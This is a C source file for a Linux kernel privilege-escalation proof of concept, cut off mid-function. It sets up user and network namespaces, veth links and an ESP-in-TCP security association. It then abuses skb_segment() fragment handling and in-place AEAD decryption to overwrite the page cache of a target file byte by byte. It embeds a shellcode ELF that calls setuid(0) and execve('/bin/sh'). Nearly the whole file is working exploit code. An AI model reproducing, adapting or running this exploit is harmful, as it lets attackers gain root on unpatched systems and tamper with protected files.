// gcc -O2 -Wall -Wextra -std=gnu11 -static -o skb_segment_exploit skb_segment_exploit.c /* * skb_segment_exploit.c — CVE PoC: page-cache corruption via skb_segment() * SKBFL_SHARED_FRAG stripping + ESP-in-TCP decrypt * * Fork a sender+receiver pair to trigger one ESP-in-TCP decrypt cycle. * * Sender (in ns_sender): * 1. TCP connect to RECEIVER_ADDR:TCP_PORT * 2. send() an espintcp prefix (2-byte len + ESP hdr + IV) — normal data, * no SKBFL_SHARED_FRAG * 3. splice() FRAG_LEN bytes from target_file at splice_offset into the * TCP socket — page-cache frags with SKBFL_SHARED_FRAG * * Receiver (in ns_receiver): * 1. TCP accept on RECEIVER_ADDR:TCP_PORT * 2. usleep() to let sender queue data * 3. setsockopt(TCP_ULP, "espintcp") — triggers ESP processing on * already-queued data * * The mixed send+splice data traverses: * ns_sender → veth → ns_middle (GRO coalesces, IP forwards, GSO off → * skb_segment strips SKBFL_SHARED_FRAG) → veth → ns_receiver (espintcp * → esp_input skip_cow → in-place AEAD decrypt on page-cache frags) * * Three-namespace topology for GRO → skb_segment() exploitation: * * ns_sender (10.0.1.1) ←veth_s / veth_m1→ ns_middle (10.0.1.2, 10.0.2.1) * ↕ IP forward, GSO off on veth_m2 * ns_receiver (10.0.2.2) ←veth_r / veth_m2→ ns_middle */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* ── compat defines ── */ #ifndef TCP_ULP #define TCP_ULP 31 #endif #ifndef TCP_ENCAP_ESPINTCP #define TCP_ENCAP_ESPINTCP 7 #endif #ifndef AF_ALG #define AF_ALG 38 #endif #ifndef SOL_ALG #define SOL_ALG 279 #endif #ifndef ALG_SET_KEY #define ALG_SET_KEY 1 #endif #ifndef ALG_SET_OP #define ALG_SET_OP 3 #endif #ifndef ALG_OP_ENCRYPT #define ALG_OP_ENCRYPT 1 #endif #ifndef NLA_ALIGNTO #define NLA_ALIGNTO 4 #endif #ifndef NLA_ALIGN #define NLA_ALIGN(len) (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1)) #endif #ifndef NLA_HDRLEN #define NLA_HDRLEN ((int)NLA_ALIGN(sizeof(struct nlattr))) #endif /* ── network topology addresses ── */ #define SENDER_ADDR "10.0.1.1" #define MIDDLE_ADDR1 "10.0.1.2" #define MIDDLE_ADDR2 "10.0.2.1" #define RECEIVER_ADDR "10.0.2.2" #define PREFIX_LEN 24 /* ── ESP / trigger constants ── */ #define TCP_PORT 5556 #define ESP_SPI 0x100 #define FRAG_LEN 4096 #define ESP_GCM_ICV_LEN 16 #define ESP_GCM_ENCRYPTED_LEN (FRAG_LEN - ESP_GCM_ICV_LEN) /* ── timing knobs ── */ #define RECEIVER_PRE_ULP_US 50000 #define SENDER_PRE_SPLICE_US 5000 #define RECEIVER_POST_ULP_US 50000 /* ── ANSI colours ── */ #define C_RESET "\033[0m" #define C_DIM "\033[2m" #define C_RED "\033[31m" #define C_CYAN "\033[36m" #define C_BRED "\033[1;31m" #define C_BGRN "\033[1;32m" #define C_BCYN "\033[1;36m" #define C_BWHT "\033[1;97m" /* ── static constants ── */ /* AES-128-GCM key (16 bytes) + 4-byte salt = 20 bytes total for rfc4106 */ static const unsigned char XFRM_AEAD_KEY[20] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04 }; /* LPE payload: 120-byte ET_DYN ELF with overlapping phdr+header. * setuid(0) + execve("/bin/sh"). Smaller = fewer trigger cycles. * From DirtyDecrypt — fits any PIE binary (ET_DYN, x86_64). * PT_LOAD covers 120 bytes; sliding-window damage past offset 120 * is beyond the loadable segment. */ #define PAYLOAD_LEN 120 static const uint8_t SHELL_ELF[PAYLOAD_LEN] = { 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x03,0x00,0x3e,0x00,0x01,0x00,0x00,0x00, 0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x38,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00, 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00, 0x78,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x78,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xb0,0x69,0x0f,0x05, /* setuid(0) */ 0x48,0x8d,0x3d,0xdd,0xff,0xff,0xff, /* lea rdi, "/bin/sh" */ 0x6a,0x3b,0x58, /* push 59; pop rax */ 0x0f,0x05, /* execve("/bin/sh", 0, 0) */ }; /* ── topology struct ── */ struct topology { pid_t sender_pid; pid_t receiver_pid; }; /* ── trigger params struct ── */ struct trigger_params { const char *target_file; loff_t splice_offset; unsigned char esp_iv[8]; uint32_t esp_seq; pid_t sender_pid; pid_t receiver_pid; }; /* ── forward declarations ── */ static int open_ns_fd(pid_t pid); /* ======================================================================== * common.h inline helpers * ======================================================================== */ static void die(const char *what) { fprintf(stderr, "FATAL: %s: %s\n", what, strerror(errno)); _exit(2); } static void gate_fail(const char *what) { fprintf(stderr, "GATE: %s: errno=%d (%s)\n", what, errno, strerror(errno)); _exit(4); } static void store_be32(unsigned char *p, uint32_t v) { p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16); p[2] = (unsigned char)(v >> 8); p[3] = (unsigned char)v; } static void nl_add_attr(struct nlmsghdr *nlh, size_t maxlen, unsigned short type, const void *data, size_t len) { size_t off = NLMSG_ALIGN(nlh->nlmsg_len); struct nlattr *nla; if (off + NLA_HDRLEN + len > maxlen) { fprintf(stderr, "nlmsg overflow\n"); _exit(2); } nla = (struct nlattr *)((char *)nlh + off); nla->nla_type = type; nla->nla_len = NLA_HDRLEN + len; memcpy((char *)nla + NLA_HDRLEN, data, len); nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len); } static int nl_check_ack(const void *buf, ssize_t len) { const struct nlmsghdr *nlh; for (nlh = (const struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len); nlh = NLMSG_NEXT(nlh, len)) { if (nlh->nlmsg_type == NLMSG_ERROR) { struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(nlh); if (err->error == 0) return 0; errno = -err->error; return -1; } } errno = EPROTO; return -1; } /* ======================================================================== * netns.c — namespace topology * ======================================================================== */ static void netns_sync_write(int fd) { char c = 'R'; if (write(fd, &c, 1) != 1) die("sync_write"); close(fd); } static void netns_sync_read(int fd) { char c; if (read(fd, &c, 1) != 1) die("sync_read"); close(fd); } static void write_file(const char *path, const char *data) { int fd = open(path, O_WRONLY); if (fd < 0) die(path); if (write(fd, data, strlen(data)) < 0) die(path); close(fd); } static void enter_userns(void) { uid_t outer_uid = getuid(); gid_t outer_gid = getgid(); int ready_pipe[2], mapped_pipe[2], status; char map[64]; pid_t child; if (pipe(ready_pipe) < 0) die("pipe ready"); if (pipe(mapped_pipe) < 0) die("pipe mapped"); child = fork(); if (child < 0) die("fork userns"); if (child > 0) { close(ready_pipe[1]); close(mapped_pipe[0]); netns_sync_read(ready_pipe[0]); snprintf(map, sizeof(map), "0 %u 1\n", outer_uid); { char p[128]; snprintf(p, sizeof(p), "/proc/%ld/uid_map", (long)child); write_file(p, map); snprintf(p, sizeof(p), "/proc/%ld/setgroups", (long)child); write_file(p, "deny\n"); snprintf(map, sizeof(map), "0 %u 1\n", outer_gid); snprintf(p, sizeof(p), "/proc/%ld/gid_map", (long)child); write_file(p, map); } netns_sync_write(mapped_pipe[1]); if (waitpid(child, &status, 0) < 0) die("wait userns child"); if (WIFEXITED(status)) _exit(WEXITSTATUS(status)); if (WIFSIGNALED(status)) { fprintf(stderr, "userns child killed by signal %d\n", WTERMSIG(status)); _exit(2); } _exit(2); } close(ready_pipe[0]); close(mapped_pipe[1]); if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)"); netns_sync_write(ready_pipe[1]); netns_sync_read(mapped_pipe[0]); if (setresgid(0, 0, 0) < 0) gate_fail("setresgid"); if (setresuid(0, 0, 0) < 0) gate_fail("setresuid"); } static void bring_loopback_up(void) { struct ifreq ifr; int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (fd < 0) gate_fail("socket for lo"); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail("SIOCGIFFLAGS lo"); ifr.ifr_flags |= IFF_UP; if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail("SIOCSIFFLAGS lo"); close(fd); } static int rtnl_open(void) { struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_ROUTE); if (fd < 0) die("socket(NETLINK_ROUTE)"); if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("bind(NETLINK_ROUTE)"); return fd; } static void rtnl_talk(int fd, struct nlmsghdr *nlh) { struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; char resp[4096]; ssize_t ret; ret = sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)); if (ret < 0 || ret != (ssize_t)nlh->nlmsg_len) die("rtnl sendto"); ret = recv(fd, resp, sizeof(resp), 0); if (ret < 0) die("rtnl recv"); if (nl_check_ack(resp, ret) < 0) gate_fail("rtnl ack"); } static size_t nl_nest_start(struct nlmsghdr *nlh, unsigned short type) { size_t off = NLMSG_ALIGN(nlh->nlmsg_len); struct nlattr *nla = (struct nlattr *)((char *)nlh + off); nla->nla_type = type; nla->nla_len = NLA_HDRLEN; nlh->nlmsg_len = off + NLA_HDRLEN; return off; } static void nl_nest_end(struct nlmsghdr *nlh, size_t nest_off) { struct nlattr *nla = (struct nlattr *)((char *)nlh + nest_off); nla->nla_len = NLMSG_ALIGN(nlh->nlmsg_len) - nest_off; } static pid_t spawn_ns_child(void) { int p[2]; pid_t child; if (pipe(p) < 0) die("pipe ns_child"); child = fork(); if (child < 0) die("fork ns_child"); if (child == 0) { close(p[0]); if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET) child"); bring_loopback_up(); netns_sync_write(p[1]); pause(); _exit(0); } close(p[1]); netns_sync_read(p[0]); return child; } static void create_veth_pair(int rtnl_fd, const char *name_a, const char *name_b, pid_t peer_ns_pid) { char buf[4096]; struct nlmsghdr *nlh; struct ifinfomsg *ifi; size_t linkinfo_off, data_off, peer_off; memset(buf, 0, sizeof(buf)); nlh = (struct nlmsghdr *)buf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(*ifi)); nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; nlh->nlmsg_seq = 1; ifi = (struct ifinfomsg *)NLMSG_DATA(nlh); ifi->ifi_family = AF_UNSPEC; nl_add_attr(nlh, sizeof(buf), IFLA_IFNAME, name_a, strlen(name_a) + 1); linkinfo_off = nl_nest_start(nlh, IFLA_LINKINFO); nl_add_attr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5); data_off = nl_nest_start(nlh, IFLA_INFO_DATA); peer_off = nl_nest_start(nlh, VETH_INFO_PEER); { size_t cur = NLMSG_ALIGN(nlh->nlmsg_len); struct ifinfomsg *peer_ifi = (struct ifinfomsg *)((char *)nlh + cur); memset(peer_ifi, 0, sizeof(*peer_ifi)); peer_ifi->ifi_family = AF_UNSPEC; nlh->nlmsg_len = cur + sizeof(*peer_ifi); } nl_add_attr(nlh, sizeof(buf), IFLA_IFNAME, name_b, strlen(name_b) + 1); if (peer_ns_pid > 0) { uint32_t pid32 = (uint32_t)peer_ns_pid; nl_add_attr(nlh, sizeof(buf), IFLA_NET_NS_PID, &pid32, sizeof(pid32)); } nl_nest_end(nlh, peer_off); nl_nest_end(nlh, data_off); nl_nest_end(nlh, linkinfo_off); rtnl_talk(rtnl_fd, nlh); } static void if_up(int rtnl_fd, const char *ifname) { char buf[512]; struct nlmsghdr *nlh; struct ifinfomsg *ifi; unsigned int idx; idx = if_nametoindex(ifname); if (idx == 0) die(ifname); memset(buf, 0, sizeof(buf)); nlh = (struct nlmsghdr *)buf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(*ifi)); nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = 1; ifi = (struct ifinfomsg *)NLMSG_DATA(nlh); ifi->ifi_family = AF_UNSPEC; ifi->ifi_index = idx; ifi->ifi_flags = IFF_UP; ifi->ifi_change = IFF_UP; rtnl_talk(rtnl_fd, nlh); } static void add_addr(int rtnl_fd, const char *ifname, const char *addr_str, int prefix_len) { char buf[512]; struct nlmsghdr *nlh; struct ifaddrmsg *ifa; struct in_addr addr; unsigned int idx; if (inet_pton(AF_INET, addr_str, &addr) != 1) die("inet_pton"); idx = if_nametoindex(ifname); if (idx == 0) die(ifname); memset(buf, 0, sizeof(buf)); nlh = (struct nlmsghdr *)buf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(*ifa)); nlh->nlmsg_type = RTM_NEWADDR; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; nlh->nlmsg_seq = 1; ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh); ifa->ifa_family = AF_INET; ifa->ifa_prefixlen = prefix_len; ifa->ifa_index = idx; ifa->ifa_scope = 0; nl_add_attr(nlh, sizeof(buf), IFA_LOCAL, &addr, sizeof(addr)); nl_add_attr(nlh, sizeof(buf), IFA_ADDRESS, &addr, sizeof(addr)); rtnl_talk(rtnl_fd, nlh); } static void add_default_route(int rtnl_fd, const char *gw_str) { char buf[512]; struct nlmsghdr *nlh; struct rtmsg *rt; struct in_addr gw; if (inet_pton(AF_INET, gw_str, &gw) != 1) die("inet_pton gw"); memset(buf, 0, sizeof(buf)); nlh = (struct nlmsghdr *)buf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(*rt)); nlh->nlmsg_type = RTM_NEWROUTE; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; nlh->nlmsg_seq = 1; rt = (struct rtmsg *)NLMSG_DATA(nlh); rt->rtm_family = AF_INET; rt->rtm_dst_len = 0; rt->rtm_table = RT_TABLE_MAIN; rt->rtm_protocol = RTPROT_BOOT; rt->rtm_scope = RT_SCOPE_UNIVERSE; rt->rtm_type = RTN_UNICAST; nl_add_attr(nlh, sizeof(buf), RTA_GATEWAY, &gw, sizeof(gw)); rtnl_talk(rtnl_fd, nlh); } static void disable_offloads(const char *ifname) { struct ifreq ifr; struct ethtool_value val; int fd; fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (fd < 0) die("socket for ethtool"); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1); memset(&val, 0, sizeof(val)); val.cmd = ETHTOOL_SGSO; val.data = 0; ifr.ifr_data = (void *)&val; if (ioctl(fd, SIOCETHTOOL, &ifr) < 0) gate_fail("ETHTOOL_SGSO off"); memset(&val, 0, sizeof(val)); val.cmd = ETHTOOL_STSO; val.data = 0; ifr.ifr_data = (void *)&val; if (ioctl(fd, SIOCETHTOOL, &ifr) < 0) gate_fail("ETHTOOL_STSO off"); memset(&val, 0, sizeof(val)); val.cmd = ETHTOOL_SGRO; val.data = 0; ifr.ifr_data = (void *)&val; if (ioctl(fd, SIOCETHTOOL, &ifr) < 0) gate_fail("ETHTOOL_SGRO off"); close(fd); } static int save_ns_fd(void) { int fd = open("/proc/self/ns/net", O_RDONLY); if (fd < 0) die("open /proc/self/ns/net"); return fd; } static void enter_ns(pid_t pid) { int fd = open_ns_fd(pid); if (setns(fd, CLONE_NEWNET) < 0) die("setns"); close(fd); } static void return_to_ns(int fd) { if (setns(fd, CLONE_NEWNET) < 0) die("setns back"); close(fd); } static void configure_sender(pid_t sender_pid) { int middle_fd = save_ns_fd(); int rtnl_fd; enter_ns(sender_pid); rtnl_fd = rtnl_open(); add_addr(rtnl_fd, "veth_s", SENDER_ADDR, PREFIX_LEN); if_up(rtnl_fd, "veth_s"); add_default_route(rtnl_fd, MIDDLE_ADDR1); close(rtnl_fd); return_to_ns(middle_fd); } static void configure_receiver(pid_t receiver_pid) { int middle_fd = save_ns_fd(); int rtnl_fd; enter_ns(receiver_pid); rtnl_fd = rtnl_open(); add_addr(rtnl_fd, "veth_r", RECEIVER_ADDR, PREFIX_LEN); if_up(rtnl_fd, "veth_r"); add_default_route(rtnl_fd, MIDDLE_ADDR2); close(rtnl_fd); return_to_ns(middle_fd); } static int open_ns_fd(pid_t pid) { char path[64]; int fd; snprintf(path, sizeof(path), "/proc/%ld/ns/net", (long)pid); fd = open(path, O_RDONLY); if (fd < 0) die(path); return fd; } static int setup_topology(struct topology *topo) { int rtnl_fd; if (prctl(PR_SET_DUMPABLE, 1, 0, 0, 0) < 0) die("prctl PR_SET_DUMPABLE"); enter_userns(); if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET) middle"); bring_loopback_up(); topo->sender_pid = spawn_ns_child(); topo->receiver_pid = spawn_ns_child(); rtnl_fd = rtnl_open(); create_veth_pair(rtnl_fd, "veth_m1", "veth_s", topo->sender_pid); create_veth_pair(rtnl_fd, "veth_m2", "veth_r", topo->receiver_pid); add_addr(rtnl_fd, "veth_m1", MIDDLE_ADDR1, PREFIX_LEN); add_addr(rtnl_fd, "veth_m2", MIDDLE_ADDR2, PREFIX_LEN); if_up(rtnl_fd, "veth_m1"); if_up(rtnl_fd, "veth_m2"); close(rtnl_fd); configure_sender(topo->sender_pid); configure_receiver(topo->receiver_pid); write_file("/proc/sys/net/ipv4/ip_forward", "1"); disable_offloads("veth_m2"); return 0; } /* ======================================================================== * xfrm.c — XFRM SA installation * ======================================================================== */ static void add_xfrm_espintcp_sa(void) { char reqbuf[4096], resp[4096]; char aeadbuf[sizeof(struct xfrm_algo_aead) + sizeof(XFRM_AEAD_KEY)]; struct sockaddr_nl sa = { .nl_family = AF_NETLINK, }; struct xfrm_usersa_info *xs; struct xfrm_algo_aead *aead; struct xfrm_encap_tmpl encap; struct nlmsghdr *nlh; ssize_t ret; int fd; memset(reqbuf, 0, sizeof(reqbuf)); nlh = (struct nlmsghdr *)reqbuf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(*xs)); nlh->nlmsg_type = XFRM_MSG_NEWSA; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; nlh->nlmsg_seq = 1; xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh); if (inet_pton(AF_INET, RECEIVER_ADDR, &xs->saddr.a4) != 1) gate_fail("inet_pton saddr"); if (inet_pton(AF_INET, RECEIVER_ADDR, &xs->id.daddr.a4) != 1) gate_fail("inet_pton daddr"); xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP; xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->reqid = 1; xs->lft.soft_byte_limit = XFRM_INF; xs->lft.hard_byte_limit = XFRM_INF; xs->lft.soft_packet_limit = XFRM_INF; xs->lft.hard_packet_limit = XFRM_INF; memset(aeadbuf, 0, sizeof(aeadbuf)); aead = (struct xfrm_algo_aead *)aeadbuf; snprintf(aead->alg_name, sizeof(aead->alg_name), "rfc4106(gcm(aes))"); aead->alg_key_len = sizeof(XFRM_AEAD_KEY) * 8; aead->alg_icv_len = 128; memcpy(aead->alg_key, XFRM_AEAD_KEY, sizeof(XFRM_AEAD_KEY)); nl_add_attr(nlh, sizeof(reqbuf), XFRMA_ALG_AEAD, aeadbuf, sizeof(aeadbuf)); memset(&encap, 0, sizeof(encap)); encap.encap_type = TCP_ENCAP_ESPINTCP; encap.encap_sport = htons(TCP_PORT); encap.encap_dport = htons(TCP_PORT); nl_add_attr(nlh, sizeof(reqbuf), XFRMA_ENCAP, &encap, sizeof(encap)); fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_XFRM); if (fd < 0) gate_fail("socket(NETLINK_XFRM)"); if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail("bind(NETLINK_XFRM)"); memset(&sa, 0, sizeof(sa)); sa.nl_family = AF_NETLINK; ret = sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)); if (ret < 0) gate_fail("sendto XFRM_MSG_NEWSA"); if (ret != (ssize_t)nlh->nlmsg_len) { errno = EIO; gate_fail("short sendto XFRM_MSG_NEWSA"); } ret = recv(fd, resp, sizeof(resp), 0); if (ret < 0) gate_fail("recv XFRM ack"); if (nl_check_ack(resp, ret) < 0) gate_fail("XFRM_MSG_NEWSA ack"); close(fd); } /* ======================================================================== * keystream.c — AES-GCM keystream table * ======================================================================== */ static uint16_t stream0_nonce[256]; static bool stream0_have[256]; static int open_afalg_aes_ecb(void) { struct sockaddr_alg sa = { .salg_family = AF_ALG, }; int fd; fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0); if (fd < 0) die("socket(AF_ALG)"); strcpy((char *)sa.salg_type, "skcipher"); strcpy((char *)sa.salg_name, "ecb(aes)"); if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("bind AF_ALG ecb(aes)"); if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, XFRM_AEAD_KEY, 16) < 0) die("setsockopt AF_ALG key"); return fd; } static void afalg_aes_encrypt_block(int alg_fd, const unsigned char in[16], unsigned char out[16]) { char cbuf[CMSG_SPACE(sizeof(uint32_t))] = {}; struct iovec iov = { .iov_base = (void *)in, .iov_len = 16, }; struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cbuf, .msg_controllen = sizeof(cbuf), }; struct cmsghdr *cmsg; uint32_t op = ALG_OP_ENCRYPT; ssize_t ret; int op_fd; op_fd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC); if (op_fd < 0) die("accept AF_ALG"); cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_level = SOL_ALG; cmsg->cmsg_type = ALG_SET_OP; cmsg->cmsg_len = CMSG_LEN(sizeof(op)); memcpy(CMSG_DATA(cmsg), &op, sizeof(op)); ret = sendmsg(op_fd, &msg, 0); if (ret != 16) die("sendmsg AF_ALG block"); ret = read(op_fd, out, 16); if (ret != 16) die("read AF_ALG block"); close(op_fd); } static unsigned char aes_gcm_stream0_byte(int alg_fd, const unsigned char iv[8]) { unsigned char counter_block[16], stream[16]; memcpy(counter_block, &XFRM_AEAD_KEY[16], 4); memcpy(counter_block + 4, iv, 8); store_be32(counter_block + 12, 2); afalg_aes_encrypt_block(alg_fd, counter_block, stream); return stream[0]; } static void build_stream0_table(void) { unsigned char iv[8] = { 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc }; unsigned int count = 0, nonce; int alg_fd; alg_fd = open_afalg_aes_ecb(); for (nonce = 0; nonce <= 0xffff && count < 256; nonce++) { unsigned char b; store_be32(iv + 4, nonce); b = aes_gcm_stream0_byte(alg_fd, iv); if (stream0_have[b]) continue; stream0_have[b] = true; stream0_nonce[b] = (uint16_t)nonce; count++; } close(alg_fd); if (count != 256) { fprintf(stderr, "failed to build complete stream-byte table: %u/256\n", count); _exit(2); } } static void choose_iv_for_stream0(unsigned char need_stream, unsigned char iv_out[8]) { uint16_t nonce = stream0_nonce[need_stream]; memset(iv_out, 0xcc, 8); store_be32(iv_out + 4, nonce); } /* ======================================================================== * trigger.c — sender/receiver trigger * ======================================================================== */ static void trigger_enter_netns(pid_t pid) { char path[64]; int fd; snprintf(path, sizeof(path), "/proc/%d/ns/net", (int)pid); fd = open(path, O_RDONLY | O_CLOEXEC); if (fd < 0) die("open netns"); if (setns(fd, CLONE_NEWNET) < 0) die("setns"); close(fd); } static void trigger_write_ready(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("write_ready"); close(fd); } static void trigger_wait_ready(int fd) { unsigned char b; if (read(fd, &b, 1) != 1) die("wait_ready"); close(fd); } static void receiver_child(const struct trigger_params *p, int ready_fd) { struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(TCP_PORT), }; char ulp[] = "espintcp"; int fd, cfd, one = 1; trigger_enter_netns(p->receiver_pid); inet_pton(AF_INET, RECEIVER_ADDR, &addr.sin_addr); fd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, 0); if (fd < 0) die("receiver socket"); if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)) < 0) die("receiver reuseaddr"); if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) die("receiver bind"); if (listen(fd, 1) < 0) die("receiver listen"); trigger_write_ready(ready_fd); cfd = accept4(fd, NULL, NULL, SOCK_CLOEXEC); if (cfd < 0) die("receiver accept"); usleep(RECEIVER_PRE_ULP_US); if (setsockopt(cfd, IPPROTO_TCP, TCP_ULP, ulp, sizeof(ulp)) < 0) die("receiver TCP_ULP espintcp"); usleep(RECEIVER_POST_ULP_US); close(cfd); close(fd); _exit(0); } static void sender_child(const struct trigger_params *p, int ready_fd) { struct sockaddr_in dst = { .sin_family = AF_INET, .sin_port = htons(TCP_PORT), }; struct { __be16 len; unsigned char esp[16]; } prefix; int fd, sock, pp[2], one = 1; ssize_t ret; loff_t off; trigger_enter_netns(p->sender_pid); trigger_wait_ready(ready_fd); inet_pton(AF_INET, RECEIVER_ADDR, &dst.sin_addr); fd = open(p->target_file, O_RDONLY | O_CLOEXEC); if (fd < 0) die("sender open target"); sock = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC, 0); if (sock < 0) die("sender socket"); if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, &one, sizeof(one)) < 0) die("sender TCP_NODELAY"); if (connect(sock, (struct sockaddr *)&dst, sizeof(dst)) < 0) die("sender connect"); memset(&prefix, 0, sizeof(prefix)); prefix.len = htons(sizeof(prefix) + FRAG_LEN); store_be32(&prefix.esp[0], ESP_SPI); store_be32(&prefix.esp[4], p->esp_seq); memcpy(&prefix.esp[8], p->esp_iv, 8); ret = send(sock, &prefix, sizeof(prefix), 0); if (ret != (ssize_t)sizeof(prefix)) die("sender send prefix"); usleep(SENDER_PRE_SPLICE_US); if (pipe(pp) < 0) die("sender pipe"); off = p->splice_offset; ret = splice(fd, &off, pp[1], NULL, FRAG_LEN, 0); if (ret != FRAG_LEN) die("sender splice file to pipe"); ret = splice(pp[0], NULL, sock, NULL, FRAG_LEN, 0); if (ret < 0) die("sender splice pipe to tcp"); close(pp[0]); close(pp[1]); close(sock); close(fd); _exit(ret == FRAG_LEN ? 0 : 3); } static int run_trigger_pair(const struct trigger_params *p) { int pipefd[2], st_rx, st_tx; pid_t rx, tx; if (pipe(pipefd) < 0) die("pipe"); rx = fork(); if (rx < 0) die("fork receiver"); if (rx == 0) { close(pipefd[0]); receiver_child(p, pipefd[1]); } tx = fork(); if (tx < 0) die("fork sender"); if (tx == 0) { close(pipefd[1]); sender_child(p, pipefd[0]); } close(pipefd[0]); close(pipefd[1]); if (waitpid(tx, &st_tx, 0) < 0) die("wait sender"); if (waitpid(rx, &st_rx, 0) < 0) die("wait receiver"); if (!WIFEXITED(st_tx) || WEXITSTATUS(st_tx) != 0 || !WIFEXITED(st_rx) || WEXITSTATUS(st_rx) != 0) return -1; return 0; } /* ======================================================================== * main.c — orchestration, LPE * ======================================================================== */ static char target_file_buf[PATH_MAX]; static const char *target_file; static void *target_map = MAP_FAILED; /* MAP_SHARED page-cache view */ static int target_rfd = -1; /* read-only fd kept open for mmap */ static char backup_path[PATH_MAX]; static unsigned char read_byte_at(const char *path, uint64_t off) { /* Fast path: read directly from mmap'd page cache */ if (target_map != MAP_FAILED) return ((const unsigned char *)target_map)[off]; /* Fallback: pread */ unsigned char b; int fd = open(path, O_RDONLY | O_CLOEXEC); if (fd < 0) die("open read byte"); ssize_t ret = pread(fd, &b, 1, (off_t)off); if (ret != 1) die("pread byte"); close(fd); return b; } static uint64_t use_existing_target(const char *path) { struct stat lst, st; if (lstat(path, &lst) < 0) die("lstat target"); if (!S_ISREG(lst.st_mode)) { fprintf(stderr, "target is not a regular file\n"); _exit(2); } if (stat(path, &st) < 0) die("stat target"); if (!S_ISREG(st.st_mode)) { fprintf(stderr, "target is not a regular file (after symlink)\n"); _exit(2); } if (st.st_size < FRAG_LEN) { fprintf(stderr, "target too small: size=%lld need>=%d\n", (long long)st.st_size, FRAG_LEN); _exit(2); } if (snprintf(target_file_buf, sizeof(target_file_buf), "%s", path) >= (int)sizeof(target_file_buf)) { fprintf(stderr, "target path too long\n"); _exit(2); } target_file = target_file_buf; return (uint64_t)st.st_size; } static void verify_write_denied(const char *label) { int fd; errno = 0; fd = open(target_file, O_WRONLY | O_CLOEXEC); if (fd >= 0) { close(fd); fprintf(stderr, "GATE: %s write-open unexpectedly succeeded\n", label); _exit(4); } 